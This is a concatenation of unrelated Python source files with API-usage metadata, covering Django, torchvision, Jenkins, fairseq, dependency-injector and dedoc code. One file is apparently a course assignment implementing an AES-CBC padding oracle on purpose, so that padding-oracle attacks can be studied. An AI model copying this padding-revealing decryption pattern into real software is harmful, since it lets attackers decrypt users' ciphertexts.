"pyautogui.screenshot", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 232, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 233, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 239, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 240, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 253, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 254, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 260, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 261, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 263, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 264, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 266, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 267, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 269, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 270, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 272, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 273, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 275, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 276, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 278, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 279, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 303, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 304, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 311, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 312, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 314, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 315, "usage_type": "call"}, {"api_name": "pyautogui.screenshot", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 336, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 344, "usage_type": "call"}, {"api_name": "pyautogui.screenshot", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 370, "usage_type": "call"}, {"api_name": "os.path", "line_number": 370, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 374, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 375, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 376, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 381, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 382, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 384, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 385, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 387, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 388, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 392, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 404, "usage_type": "call"}, {"api_name": "os.path", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path", "line_number": 412, "usage_type": "attribute"}, {"api_name": "unittest.TestLoader", "line_number": 420, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 421, "usage_type": "call"}]}
+{"seq_id": "390075539", "text": "from django.core.management.base import BaseCommand\n\nfrom decimal import Decimal\n\nfrom sakila import assignments\n\n\nEXPECTED_RESULTS = {\n 'assignment_1': 1000,\n 'assignment_2': 211,\n 'assignment_3': ['Mike Hillyer'],\n 'assignment_4': 'ELEANOR HUNT',\n 'assignment_5': 'Sports',\n 'assignment_6': [(1, Decimal('33679.79')), (2, Decimal('33726.77'))],\n 'assignment_7': [u'Aurora', u'London', u'Saint-Denis', u'Cape Coral'],\n 'assignment_8': [\n (u'English', 1000),\n (u'Italian', 0),\n (u'Japanese', 0),\n (u'Mandarin', 0),\n (u'French', 0),\n (u'German', 0)\n ],\n 'assignment_9': 'BUCKET BROTHERHOOD'\n}\n\n\nclass Command(BaseCommand):\n help = ''\n\n def handle(self, *args, **options):\n for func, expected_result in EXPECTED_RESULTS.items():\n exec_result = getattr(assignments, func)()\n try:\n assert exec_result == expected_result\n except AssertionError:\n print('Test \"{}\" failed. Expected \"{}\", but got \"{}\"'.format(\n func, expected_result, exec_result))\n print('All tests passing!')\n", "sub_path": "rmotr_sakila/sakila/management/commands/runtests.py", "file_name": "runtests.py", "file_ext": "py", "file_size_in_byte": 1144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "decimal.Decimal", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 28, "usage_type": "name"}, {"api_name": "sakila.assignments", "line_number": 33, "usage_type": "argument"}]}
+{"seq_id": "379175944", "text": "from __future__ import print_function\nimport os\nimport io\nimport re\nimport sys\nfrom setuptools import setup, find_packages\nfrom pkg_resources import get_distribution, DistributionNotFound\nimport subprocess\n\n\ndef read(*names, **kwargs):\n with io.open(\n os.path.join(os.path.dirname(__file__), *names),\n encoding=kwargs.get(\"encoding\", \"utf8\")\n ) as fp:\n return fp.read()\n\n\ndef get_dist(pkgname):\n try:\n return get_distribution(pkgname)\n except DistributionNotFound:\n return None\n\n\nversion = '0.2.3a0'\nsha = 'Unknown'\npackage_name = os.getenv('TORCHVISION_PACKAGE_NAME', 'torchvision')\n\ncwd = os.path.dirname(os.path.abspath(__file__))\n\ntry:\n sha = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=cwd).decode('ascii').strip()\nexcept Exception:\n pass\n\nif os.getenv('TORCHVISION_BUILD_VERSION'):\n assert os.getenv('TORCHVISION_BUILD_NUMBER') is not None\n build_number = int(os.getenv('TORCHVISION_BUILD_NUMBER'))\n version = os.getenv('TORCHVISION_BUILD_VERSION')\n if build_number > 1:\n version += '.post' + str(build_number)\nelif sha != 'Unknown':\n version += '+' + sha[:7]\nprint(\"Building wheel {}-{}\".format(package_name, version))\n\n\ndef write_version_file():\n version_path = os.path.join(cwd, 'torchvision', 'version.py')\n with open(version_path, 'w') as f:\n f.write(\"__version__ = '{}'\\n\".format(version))\n f.write(\"git_version = {}\\n\".format(repr(sha)))\n\n\nwrite_version_file()\n\nreadme = open('README.rst').read()\n\npytorch_package_name = os.getenv('TORCHVISION_PYTORCH_DEPENDENCY_NAME', 'torch')\n\nrequirements = [\n 'numpy',\n 'six',\n pytorch_package_name,\n]\n\npillow_ver = ' >= 4.1.1'\npillow_req = 'pillow-simd' if get_dist('pillow-simd') is not None else 'pillow'\nrequirements.append(pillow_req + pillow_ver)\n\n\nsetup(\n # Metadata\n name=package_name,\n version=version,\n author='PyTorch Core Team',\n author_email='soumith@pytorch.org',\n url='https://github.com/pytorch/vision',\n description='image and video datasets and models for torch deep learning',\n long_description=readme,\n license='BSD',\n\n # Package info\n packages=find_packages(exclude=('test',)),\n\n zip_safe=True,\n install_requires=requirements,\n extras_require={\n \"scipy\": [\"scipy\"],\n },\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io.open", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "pkg_resources.get_distribution", "line_number": 21, "usage_type": "call"}, {"api_name": "pkg_resources.DistributionNotFound", "line_number": 22, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 38, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 59, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 72, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "419771559", "text": "import json\nimport subprocess\n\n\n# Get Kustomize manifests\nresult = subprocess.run([\"bash\", \"-c\", \"kubectl kustomize manifests/env/provision\"], stdout=subprocess.PIPE)\n\ndata_obj ={\n \"data\": result.stdout.decode(\"utf-8\")\n}\nprint(json.dumps(data_obj))\n", "sub_path": "scripts/terraform/scripts/external_kustomize_manifest.py", "file_name": "external_kustomize_manifest.py", "file_ext": "py", "file_size_in_byte": 252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "subprocess.run", "line_number": 6, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "213766232", "text": "import sys\nimport argparse\nimport requests\nimport xml.etree.ElementTree as ET\n\nJENKINS_BASE_URL = \"http://localhost:8080\"\nJENKINS_PLUGIN_MANAGER_PATH = \"pluginManager/api/xml?depth=1\"\nDEFAULT_CHUNK_SIZE = 20\nTAGS = {\n \"VERSION\": \"version\",\n \"SHORT_NAME\": \"shortName\"\n}\n\n\ndef main():\n arg_parser = argparse.ArgumentParser(\n prog=\"list-jenkins-plugins\",\n description=\"snapshot list of installed plugins on a Jenkins instance in plugins.txt format\"\n )\n arg_parser.add_argument(\n \"jenkins_base_url\",\n nargs=\"?\",\n default=JENKINS_BASE_URL,\n help=\"Jenkins instance base url. Defaults to {}\".format(JENKINS_BASE_URL)\n ),\n arg_parser.add_argument(\n \"--user\", \"-u\",\n default=\"\"\n ),\n arg_parser.add_argument(\n \"--password\", \"-p\",\n default=\"\"\n ),\n arg_parser.add_argument(\n \"--chunk-size\", \"-c\",\n type=int,\n default=DEFAULT_CHUNK_SIZE,\n help=\"Jenkins response streaming chunks size. Defaults to {} kB\".format(DEFAULT_CHUNK_SIZE)\n )\n args = arg_parser.parse_args()\n return parse_xml_plugins_list(args.jenkins_base_url, args.chunk_size, (args.user, args.password))\n\n\ndef parse_xml_plugins_list(jenkins_base_url, chunk_size, auth):\n chunk_size = chunk_size * 1024\n xml_pull_parser = ET.XMLPullParser()\n plugins = []\n\n with requests.get(\n \"{jenkins_base_url}/{path}\".format(jenkins_base_url=jenkins_base_url, path=JENKINS_PLUGIN_MANAGER_PATH),\n auth=auth,\n stream=True\n ) as jenkins_response:\n # parse the xml plugins list a chunk at a time, a very large set of plugins may be installed\n for chunk in jenkins_response.iter_content(chunk_size):\n if chunk:\n xml_pull_parser.feed(chunk)\n try:\n for event, element in xml_pull_parser.read_events():\n \"\"\"\n Rely on the fact that a plugin version is always \n encountered after its short name in tag children\n \"\"\"\n if TAGS[\"SHORT_NAME\"] == element.tag:\n plugin_line = element.text\n elif TAGS[\"VERSION\"] == element.tag:\n plugins.append(plugin_line + \":\" + element.text)\n plugin_line = \"\"\n except ET.ParseError as parse_err:\n print(\n \"Jenkins response is not in parsable XML format, \"\n \"check your access rights to the instance: {parse_err}\"\n .format(parse_err=parse_err)\n )\n return 1\n for plugin in sorted(plugins):\n print(plugin)\n return 0\n\n\nif \"__main__\" == __name__:\n sys.exit(main())\n", "sub_path": "list-jenkins-plugins/list_jenkins_plugins.py", "file_name": "list_jenkins_plugins.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.XMLPullParser", "line_number": 46, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 69, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "160806010", "text": "from fairseq.data import Dictionary\nfrom fairseq.data.meta_dataset import MetaFairseqDataset\nfrom . import FairseqTask, register_task\nimport torch\nimport os\n\n# Represents a sine task\n@register_task('meta')\nclass MetaTask(FairseqTask):\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add task-specific arguments to the parser.\"\"\"\n parser.add_argument('data', nargs='+', help='path(s) to data directorie(s)')\n parser.add_argument('-s', '--source-lang', default='en', metavar='SRC',\n help='source language')\n parser.add_argument('-t', '--target-lang', default='de', metavar='TARGET',\n help='target language')\n\n def __init__(self, args, meta_train_tasks, meta_dev_tasks, meta_test_tasks, src_dict, tgt_dict):\n self.datasets = {}\n self.args = args\n self.meta_train_tasks = meta_train_tasks\n self.meta_dev_tasks = meta_dev_tasks\n self.meta_test_tasks = meta_test_tasks\n self.src_dict = src_dict\n self.tgt_dict = tgt_dict\n\n @classmethod\n def setup_task(cls, args, meta_train_tasks, meta_dev_tasks, meta_test_tasks, **kwargs):\n \"\"\"Setup the task (e.g., load dictionaries).\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n \"\"\"\n # load dictionaries\n src_dict = cls.load_dictionary(os.path.join(args.data[0], 'dict.{}.txt'.format(args.source_lang)))\n tgt_dict = cls.load_dictionary(os.path.join(args.data[0], 'dict.{}.txt'.format(args.target_lang)))\n assert src_dict.pad() == tgt_dict.pad()\n assert src_dict.eos() == tgt_dict.eos()\n assert src_dict.unk() == tgt_dict.unk()\n print('| [{}] dictionary: {} types'.format(args.source_lang, len(src_dict)))\n print('| [{}] dictionary: {} types'.format(args.target_lang, len(tgt_dict)))\n return cls(args=args, meta_train_tasks=meta_train_tasks, meta_dev_tasks=meta_dev_tasks,\n meta_test_tasks=meta_test_tasks, src_dict=src_dict, tgt_dict=tgt_dict)\n\n def load_dataset(self, split, **kwargs):\n \"\"\"Load a given dataset split.\n\n Args:\n split (str): name of the split (e.g., train, valid, test)\n \"\"\"\n if split == self.args.train_subset:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_train_tasks)\n elif split == self.args.valid_subset.split(',')[0]:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_dev_tasks)\n else:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_test_tasks)\n\n @property\n def source_dictionary(self):\n \"\"\"Return the source :class:`~fairseq.data.Dictionary`.\"\"\"\n return self.src_dict\n\n @property\n def target_dictionary(self):\n \"\"\"Return the target :class:`~fairseq.data.Dictionary`.\"\"\"\n return self.tgt_dict\n\n def inference_step(self, generator, models, sample, prefix_tokens=None):\n assert False\n\n def valid_step(self, sample, model, criterion, optimizer=None):\n model.eval()\n with torch.enable_grad():\n loss, sample_size, logging_output = criterion(model, sample)\n return loss, sample_size, logging_output\n", "sub_path": "fairseq/tasks/meta_task.py", "file_name": "meta_task.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 54, "usage_type": "call"}, {"api_name": "fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 56, "usage_type": "call"}, {"api_name": "fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.enable_grad", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "162470128", "text": "\"\"\"Dependency injector declarative container.\"\"\"\n\nimport six\n\nfrom dependency_injector.providers import Provider\nfrom dependency_injector.errors import Error\n\nfrom .dynamic import DynamicContainer\nfrom .utils import (\n is_container,\n deepcopy,\n _check_provider_type,\n)\n\n\nclass DeclarativeContainerMetaClass(type):\n \"\"\"Declarative inversion of control container meta class.\"\"\"\n\n def __new__(mcs, class_name, bases, attributes):\n \"\"\"Declarative container class factory.\"\"\"\n cls_providers = tuple((name, provider)\n for name, provider in six.iteritems(attributes)\n if isinstance(provider, Provider))\n\n inherited_providers = tuple((name, provider)\n for base in bases if is_container(\n base) and base is not DynamicContainer\n for name, provider in six.iteritems(\n base.cls_providers))\n\n attributes['cls_providers'] = dict(cls_providers)\n attributes['inherited_providers'] = dict(inherited_providers)\n attributes['providers'] = dict(cls_providers + inherited_providers)\n\n cls = type.__new__(mcs, class_name, bases, attributes)\n\n for provider in six.itervalues(cls.providers):\n _check_provider_type(cls, provider)\n\n return cls\n\n def __setattr__(cls, name, value):\n \"\"\"Set class attribute.\n\n If value of attribute is provider, it will be added into providers\n dictionary.\n\n :param name: Attribute's name\n :type name: str\n\n :param value: Attribute's value\n :type value: object\n\n :rtype: None\n \"\"\"\n if isinstance(value, Provider):\n _check_provider_type(cls, value)\n cls.providers[name] = value\n cls.cls_providers[name] = value\n super(DeclarativeContainerMetaClass, cls).__setattr__(name, value)\n\n def __delattr__(cls, name):\n \"\"\"Delete class attribute.\n\n If value of attribute is provider, it will be deleted from providers\n dictionary.\n\n :param name: Attribute's name\n :type name: str\n\n :rtype: None\n \"\"\"\n if name in cls.providers and name in cls.cls_providers:\n del cls.providers[name]\n del cls.cls_providers[name]\n super(DeclarativeContainerMetaClass, cls).__delattr__(name)\n\n\n@six.add_metaclass(DeclarativeContainerMetaClass)\nclass DeclarativeContainer(object):\n \"\"\"Declarative inversion of control container.\n\n .. code-block:: python\n\n class Services(DeclarativeContainer):\n auth = providers.Factory(AuthService)\n users = providers.Factory(UsersService,\n auth_service=auth)\n \"\"\"\n\n __IS_CONTAINER__ = True\n\n provider_type = Provider\n \"\"\"Type of providers that could be placed in container.\n\n :type: type\n \"\"\"\n\n instance_type = DynamicContainer\n \"\"\"Type of container that is returned on instantiating declarative\n container.\n\n :type: type\n \"\"\"\n\n providers = dict()\n \"\"\"Read-only dictionary of all providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n cls_providers = dict()\n \"\"\"Read-only dictionary of current container providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n inherited_providers = dict()\n \"\"\"Read-only dictionary of inherited providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n overridden = tuple()\n \"\"\"Tuple of overriding containers.\n\n :type: tuple[:py:class:`DeclarativeContainer`]\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"Constructor.\n\n :return: Dynamic container with copy of all providers.\n :rtype: :py:class:`DynamicContainer`\n \"\"\"\n container = cls.instance_type(*args, **kwargs)\n container.provider_type = cls.provider_type\n\n for name, provider in six.iteritems(deepcopy(cls.providers)):\n setattr(container, name, provider)\n\n return container\n\n @classmethod\n def override(cls, overriding):\n \"\"\"Override current container by overriding container.\n\n :param overriding: Overriding container.\n :type overriding: :py:class:`DeclarativeContainer`\n\n :raise: :py:exc:`dependency_injector.errors.Error` if trying to\n override container by itself or its subclasses\n\n :rtype: None\n \"\"\"\n if issubclass(cls, overriding):\n raise Error('Container {0} could not be overridden '\n 'with itself or its subclasses'.format(cls))\n\n cls.overridden += (overriding,)\n\n for name, provider in six.iteritems(overriding.cls_providers):\n try:\n getattr(cls, name).override(provider)\n except AttributeError:\n pass\n\n @classmethod\n def reset_last_overriding(cls):\n \"\"\"Reset last overriding provider for each container providers.\n\n :rtype: None\n \"\"\"\n if not cls.overridden:\n raise Error('Container {0} is not overridden'.format(cls))\n\n cls.overridden = cls.overridden[:-1]\n\n for provider in six.itervalues(cls.providers):\n provider.reset_last_overriding()\n\n @classmethod\n def reset_override(cls):\n \"\"\"Reset all overridings for each container providers.\n\n :rtype: None\n \"\"\"\n cls.overridden = tuple()\n\n for provider in six.itervalues(cls.providers):\n provider.reset_override()\n", "sub_path": "src/dependency_injector/containers/declarative.py", "file_name": "declarative.py", "file_ext": "py", "file_size_in_byte": 5677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "six.iteritems", "line_number": 22, "usage_type": "call"}, {"api_name": "dependency_injector.providers.Provider", "line_number": 23, "usage_type": "argument"}, {"api_name": "utils.is_container", "line_number": 26, "usage_type": "call"}, {"api_name": "dynamic.DynamicContainer", "line_number": 27, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 28, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 37, "usage_type": "call"}, {"api_name": "utils._check_provider_type", "line_number": 38, "usage_type": "call"}, {"api_name": "dependency_injector.providers.Provider", "line_number": 56, "usage_type": "argument"}, {"api_name": "utils._check_provider_type", "line_number": 57, "usage_type": "call"}, {"api_name": "dependency_injector.providers.Provider", "line_number": 93, "usage_type": "name"}, {"api_name": "dynamic.DynamicContainer", "line_number": 99, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 139, "usage_type": "call"}, {"api_name": "utils.deepcopy", "line_number": 139, "usage_type": "call"}, {"api_name": "dependency_injector.errors.Error", "line_number": 157, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 162, "usage_type": "call"}, {"api_name": "dependency_injector.errors.Error", "line_number": 175, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 179, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 190, "usage_type": "call"}, {"api_name": "six.add_metaclass", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "282995899", "text": "#!/usr/bin/env python3\n\n\"\"\"\nImplements a CBC padding oracle for AES-128-CBC.\n__author__ = Eik List\n__date__ = 2018-04\n__copyright__ = Creative Commons CC0\n\"\"\"\n\n# ---------------------------------------------------------\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\n# ---------------------------------------------------------\n\nclass CBCPaddingOracle:\n \"\"\"\n Implements a CBC padding oracle for AES-128-CBC.\n \"\"\"\n\n def __init__(self, key: bytes):\n \"\"\"\n Sets the key.\n :param key:\n \"\"\"\n self.key = key\n\n # ---------------------------------------------------------\n\n def encrypt(self, initial_value: bytes, message: bytes) -> bytes:\n \"\"\"\n Pads the given message to a multiple of the block length,\n computes, and returns its encryption with AES-128-CBC-XMLPad.\n\n :param initial_value: 16-byte initial value.\n :param message: Plaintext of arbitrary length\n :return: Ciphertext whose length is a multiple of 16 bytes, but\n always at least the length of the message.\n \"\"\"\n\n message = self.pad(message)\n aes = AES.new(self.key, AES.MODE_CBC, initial_value)\n return aes.encrypt(message)\n\n # ---------------------------------------------------------\n\n def verify_padding(self, initial_value: bytes, ciphertext: bytes) -> bool:\n \"\"\"\n Given a ciphertext, evaluates if the padding is correct.\n :param initial_value: 16-byte initial value.\n :param ciphertext: Ciphertext. Length must be multiple of 16 bytes.\n :return: True if padding is correct, and False otherwise.\n \"\"\"\n aes = AES.new(self.key, AES.MODE_CBC, initial_value)\n message = aes.decrypt(ciphertext)\n padding = int.from_bytes(message[-1:], byteorder='big')\n\n if padding < 1 or padding > 16:\n return False\n\n for _ in range(padding):\n if ((int.from_bytes(message[-1:], byteorder='big')) != padding):\n return False\n message = message[:-1]\n\n return True\n\n def pad(self, message: bytes) -> bytes:\n \"\"\"\n Pads the given message to a multiple of 16 bytes\n \"\"\"\n diff = 16 - (len(message) % 16)\n if diff == 0:\n return message\n\n for _ in range(diff):\n message += bytes([diff])\n\n return message\n", "sub_path": "assignment-7/cbc_padding_oracle.py", "file_name": "cbc_padding_oracle.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "Crypto.Cipher.AES.new", "line_number": 45, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 45, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 57, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 57, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 57, "usage_type": "attribute"}]}
+{"seq_id": "123491884", "text": "import warnings\nfrom collections import OrderedDict, defaultdict\nfrom typing import List, Iterable, Optional, Dict\nfrom flask_restx import fields, Api, Model\n\nfrom dedoc.config import get_config\nfrom dedoc.data_structures.annotation import Annotation\nfrom dedoc.data_structures.paragraph_metadata import ParagraphMetadata\nfrom dedoc.data_structures.serializable import Serializable\nfrom dedoc.structure_constructor.annotation_merger import AnnotationMerger\nfrom dedoc.structure_parser.heirarchy_level import HierarchyLevel\nfrom dedoc.data_structures.line_with_meta import LineWithMeta\n\n\nclass TreeNode(Serializable):\n\n def __init__(self,\n node_id: str,\n text: str,\n annotations: List[Annotation],\n metadata: ParagraphMetadata,\n subparagraphs: List[\"TreeNode\"],\n hierarchy_level: HierarchyLevel,\n parent: Optional[\"TreeNode\"]):\n \"\"\"\n TreeNode helps to represent document as recursive tree structure. It has parent node (None for root ot the tree)\n and list of children nodes (empty list for list node)\n :param node_id: node id is unique in one document\n :param text: text of node\n :param annotations: some metadata related to the part of the text (as font size)\n :param metadata: metadata refers to entire node (as node type)\n :param subparagraphs: list of child of this node\n :param hierarchy_level: helps to define the position of this node in the document tree\n :param parent: parent node (None for root, not none for other nodes)\n \"\"\"\n self.node_id = node_id\n self.text = text\n self.annotations = annotations\n self.metadata = metadata\n self.subparagraphs = subparagraphs\n self.hierarchy_level = hierarchy_level\n self.parent = parent\n\n def 